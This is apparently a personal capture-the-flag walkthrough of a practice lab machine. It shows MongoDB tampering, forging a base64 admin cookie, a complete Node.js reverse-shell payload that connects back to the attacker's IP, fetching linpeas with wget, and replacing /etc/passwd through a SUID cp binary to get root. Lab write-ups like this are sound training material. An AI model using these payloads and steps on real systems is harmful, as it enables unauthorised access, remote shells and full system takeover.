Dibble Walkthrough - OffSec Proving Grounds
Once I obtained the IP address from booting up the box, I ran an nmap scan for all ports.
export IP=192.168.164.110 nmap -p- $IP -o nmap.txt PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 3000/tcp open ppp 27017/tcp open mongod
Then I ran a service and version scan on the ports that I found open with the previous scan.
nmap -sV -sC -p 21,22,80,3000,27017 192.168.164.110 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.169 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT 22/tcp open ssh OpenSSH 8.3 (protocol 2.0) | ssh-hostkey: | 3072 9d3feb1baa9c1eb1309b23534bcf5975 (RSA) | 256 cddc05e6e3bb1233f7097450128a8564 (ECDSA) |_ 256 a0901f5078b39e412a7f5c6f4d0ea1fa (ED25519) 80/tcp open http Apache httpd 2.4.46 ((Fedora)) |_http-server-header: Apache/2.4.46 (Fedora) |_http-title: Home | Hacking Articles |_http-generator: Drupal 9 (http://www.drupal.org) | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.txt /web.config /admin/ | /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ | /user/password/ /user/login/ /user/logout/ /index.php/admin/ |_/index.php/comment/reply/ 3000/tcp open http Node.js (Express middleware) |_http-title: Site doesn't have a title (text/html; charset=utf-8). 27017/tcp open mongodb MongoDB 4.2.9 | mongodb-databases: #A lot of information for the database included
I went down the list with the open ports, port 21 I realized that it was just timing out when logging in as anonymous. I wasn't able to obtain anything from there. I skipped port 22 as I didn't have any credentials to try and the service was not vulnerable. I then went to port 80.
I looked around and didn't really see anything of interest. It just looked like a blog type website listing OWASP top 10 things on it as well as some other topics. I skipped ahead to port 3000.
Here I saw there was an option for logging in and even registering an account! So I clicked on register and set up a username of savagehack with a password of savagehack.
It took me to a place where I could edit the profile with name, twitter, fb, etc. I didn't really find much else I could really do with that.
I then went on to port 27017 the mongodb that was running. I tried to connect without credentials and was successful! Once I got in, I looked up the databases and found where the password hashes were being stored. I found an administrator account. I couldn't crack the admin password, but I was able to change the admin password to "savagehack" using the same hash that I had found from the account I made.
mongo 192.168.164.110:27017
> show dbs
account-app 0.000GB
admin 0.000GB
config 0.000GB
local 0.000GB
> use account-app
switched to db account-app
> show colletions
uncaught exception: Error: don't know how to show [colletions] :
shellHelper.show@src/mongo/shell/utils.js:1225:11
shellHelper@src/mongo/shell/utils.js:852:36
@(shellhelp2):1:12
> show collections
logmsg
users
> db.users.find()
{ "_id" : ObjectId("5f73c575eae85a15b8df908d"), "username" : "administrator", "password" : "ab6edb97f0c7a6455c57f94b7df73263e57113c85f38cd9b9470c8be8d6dd8ac", "facebook" : "NEVER!", "github" : "http://github.com/", "name" : "administrator", "twitter" : "http://twitter.com/sadserver" }
{ "_id" : ObjectId("653151c4891b2803bc83a56b"), "username" : "asdf", "password" : "64d1dd2e981b127650ef0449022387fee1223dfde5c92bb66e83060f29bfc435", "facebook" : "adsf", "github" : "asdf", "name" : "asdf", "twitter" : "asdf" }
> db.users.updateOne({username: 'administrator'},{$set: {password: '64d1dd2e981b127650ef0449022387fee1223dfde5c92bb66e83060f29bfc435'}})From there I was able to login as administrator using the password "savagehack".
After playing around a bit, I noticed that the administrator account was able to create new events and event messages, so I wanted to see if it was vulnerable to code injection via javascript. I created a username as "test" and the event message was "2*6", which if there was a vulnerability there, it would multiply these two numbers instead of it all being text.
Unfortunately it wouldn't let me create an event in the event log.
So I booted up Burp suite and used the proxy to catch the request. What I found was that there was a cookie that was base64 and URL encoded that was the "user level".
The encoding translated to "user", so I figured I would try to change it to "admin" by encoding the word admin with base64 and URL encode it and use that as the cookie.
#base 64 encode admin and url encode
YWRtaW4%3D
This worked! It made a new event in the event log, and even better, it multiplied the two numbers I gave it instead of creating text!
After some reading on this site: http://www.stackhawk.com/blog/nodejs-command-injection-examples-and-prevention/ and then searching to see if someone had already created a shell for nodejs, I found one here: http://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs
So I created another event log with the user "test" again and in the body this time, I used the reverse shell I found.
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(3000, "192.168.45.169", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();I set up a listener on port 3000, and then went through the same steps as before by including the base64 and URL encoded cookie for admin. I was instantly granted a reverse shell.
Now that I had a foothold, I grabbed the local.txt flag and uploaded it. Then I set up a python server on my kali machine and transferred and ran linpeas on the target machine using wget.
python3 -m http.server 80 wget http://192.168.45.169/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
Before the scan was even completed, I spotted a SUID binary that I knew I could us4e easily for priv esc that I had used in previous CTF's.
If you want to learn more about what I'm doing, this will explain in detail.
http://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/
I cat the /etc/passwd file from the target machine, copied it, pasted into a file on my kali machine and added a password hash of "password" to the root account.
#create a hash for "password"
openssl passwd "password"
#add the hash to the new passwd file
root:$1$KPSz68jq$DqDq73DQTTh/w09OgkRf71:0:0:root:/root:/bin/bash
From here I uploaded the new passwd file from my kali machine to the target machine in the /tmp folder using wget. I then used the SUID binary /usr/bin/cp to copy the new passwd file to replace the /etc/passwd file. Then I was able to su into root.
wget http://192.168.45.169/passwd
/usr/bin/cp passwd /etc/passwd
su root
Overall, this machine was a little difficult for the initial foothold. It took me a quite a few hours just to establish it. The priv esc was very easy and was good practice. I really enjoyed this machine though and look forward to rooting more like it.
-Sam
